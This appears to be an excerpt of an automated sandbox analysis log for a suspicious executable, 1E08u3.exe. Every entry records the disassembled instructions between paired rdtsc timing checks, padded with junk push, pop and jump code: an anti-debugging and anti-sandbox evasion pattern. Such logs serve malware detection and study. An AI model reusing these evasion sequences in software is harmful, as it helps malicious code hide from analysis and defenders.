                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FB710 second address: 6FB720 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FD3A4D6CB96h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 6FB88D second address: 6FB8AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7371DD second address: 7371E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7380A0 second address: 7380D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Ah 0x00000007 jno 00007FD3A47FEE8Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD3A47FEE94h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7380D1 second address: 7380D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7380D5 second address: 7380F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jp 00007FD3A47FEE86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD3A47FEE8Ch 0x00000011 jnc 00007FD3A47FEE88h 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 735F91 second address: 735F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 735F97 second address: 735FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A47FEE91h 0x00000009 popad 0x0000000a jmp 00007FD3A47FEE92h 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 73E183 second address: 73E189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 73E346 second address: 73E34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 74D0D7 second address: 74D0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD3A4D6CB96h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 75E82B second address: 75E846 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD3A47FEE86h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 ja 00007FD3A47FEE86h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 764516 second address: 76451A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76451A second address: 764520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 764342 second address: 76437E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD3A4D6CB96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD3A4D6CBA5h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 jns 00007FD3A4D6CB96h 0x0000001b pop eax 0x0000001c jmp 00007FD3A4D6CBA0h 0x00000021 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76437E second address: 764383 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76B1C6 second address: 76B1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD3A4D6CBA0h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD3A4D6CB9Ah 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76B5F8 second address: 76B5FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76B5FE second address: 76B604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76B88C second address: 76B8BA instructions: 0x00000000 rdtsc 0x00000002 js 00007FD3A47FEE86h 0x00000008 jmp 00007FD3A47FEE92h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD3A47FEE90h 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76B8BA second address: 76B8C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007FD3A4D6CB96h 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76B8C6 second address: 76B8D8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD3A47FEE86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FD3A47FEE86h 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76B8D8 second address: 76B8DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76BA3E second address: 76BA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76F07A second address: 76F093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A4D6CBA2h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 76F1F3 second address: 76F1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 77264B second address: 772661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD3A4D6CB9Dh 0x0000000e rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 77CD76 second address: 77CDCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD3A47FEE90h 0x00000008 jne 00007FD3A47FEE86h 0x0000000e jmp 00007FD3A47FEE97h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007FD3A47FEEA0h 0x0000001e jmp 00007FD3A47FEE98h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A72E7 second address: 7A72ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A745B second address: 7A745F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A745F second address: 7A7467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A7467 second address: 7A7472 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007FD3A47FEE86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A7472 second address: 7A7482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FD3A4D6CB96h 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A7482 second address: 7A748C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD3A47FEE86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A7B67 second address: 7A7B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A7B6D second address: 7A7B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A7E46 second address: 7A7E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD3A4D6CB96h 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A7FAA second address: 7A7FAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A813E second address: 7A8144 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7A8144 second address: 7A814A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7AC654 second address: 7AC663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD3A4D6CB96h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7AC663 second address: 7AC66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7AC66D second address: 7AC678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7AC678 second address: 7AC67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7ADEFD second address: 7ADF02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7ADF02 second address: 7ADF23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Eh 0x00000007 pushad 0x00000008 jmp 00007FD3A47FEE8Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 7ADF23 second address: 7ADF4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3A4D6CBA8h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007FD3A4D6CBA6h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D705CA second address: 4D7064F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD3A47FEE99h 0x00000008 sbb ch, FFFFFFC6h 0x0000000b jmp 00007FD3A47FEE91h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov edx, esi 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007FD3A47FEE8Dh 0x0000001c xchg eax, ebp 0x0000001d jmp 00007FD3A47FEE8Eh 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movsx ebx, si 0x0000002a pushfd 0x0000002b jmp 00007FD3A47FEE96h 0x00000030 sub eax, 69007BF8h 0x00000036 jmp 00007FD3A47FEE8Bh 0x0000003b popfd 0x0000003c popad 0x0000003d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D7064F second address: 4D70655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70655 second address: 4D70659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30EE6 second address: 4D30EEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30EEC second address: 4D30F0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30F0B second address: 4D30F28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30F28 second address: 4D30F5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, 6D89h 0x00000011 jmp 00007FD3A47FEE96h 0x00000016 popad 0x00000017 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D80674 second address: 4D80678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D80678 second address: 4D8067E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D8067E second address: 4D80684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D80684 second address: 4D80688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D80688 second address: 4D806BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD3A4D6CB9Fh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FD3A4D6CBA6h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D806BF second address: 4D806C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D806C3 second address: 4D806C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D806C7 second address: 4D806CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4CF0C10 second address: 4CF0C26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4CF0C26 second address: 4CF0C71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD3A47FEE96h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FD3A47FEE90h 0x00000016 push dword ptr [ebp+04h] 0x00000019 pushad 0x0000001a pushad 0x0000001b mov cx, F2B3h 0x0000001f mov esi, 4A03070Fh 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C0C second address: 4D30C28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C28 second address: 4D30C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C2C second address: 4D30C46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C46 second address: 4D30C58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A47FEE8Eh 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C58 second address: 4D30C75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov edi, 7BE1ECA0h 0x0000000f mov di, 32CCh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov bx, si 0x0000001c popad 0x0000001d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C75 second address: 4D30C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C7B second address: 4D30C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C7F second address: 4D30C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C83 second address: 4D30CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD3A4D6CB9Fh 0x00000012 sbb eax, 0DC20E2Eh 0x00000018 jmp 00007FD3A4D6CBA9h 0x0000001d popfd 0x0000001e mov cx, 80B7h 0x00000022 popad 0x00000023 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D209EE second address: 4D20A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A47FEE90h 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D20A02 second address: 4D20A44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD3A4D6CB9Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FD3A4D6CBA0h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 push ecx 0x00000018 pop edi 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c pop ebp 0x0000001d pushad 0x0000001e jmp 00007FD3A4D6CB9Dh 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70F4C second address: 4D70F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, edx 0x00000006 popad 0x00000007 popad 0x00000008 push ebx 0x00000009 jmp 00007FD3A47FEE8Eh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov si, dx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70F6E second address: 4D70F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70F73 second address: 4D70FB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 1B4FF5F1h 0x00000008 mov di, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 jmp 00007FD3A47FEE98h 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD3A47FEE97h 0x0000001d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70E55 second address: 4D70E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70E59 second address: 4D70E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70E5F second address: 4D70E64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
